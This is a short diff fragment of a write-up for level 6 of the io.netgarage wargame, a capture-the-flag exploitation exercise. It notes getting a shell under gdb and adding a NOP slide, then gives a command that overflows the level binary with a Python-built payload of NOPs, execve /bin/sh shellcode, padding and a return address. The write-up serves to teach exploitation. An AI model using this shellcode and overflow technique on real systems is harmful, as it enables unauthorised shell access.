MartinOravecSvK/io-netgarage/level6.md

 sh-4.3$
 ```

 After continuing throught our breakpoints we get the shell.
-If we however try this outside the gdb we get an error:

 I've also added a NOP slide (\x90 bytes) to help if the address was slightly off (this helps me in the future).
+If we however try this outside the gdb we get an error.

 ```console
 level6@io:/levels$ ./level06 $(python -c 'print "\x90"*17 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" + " " + "B"*26 + "\x1a\xfb\xff\xbf"')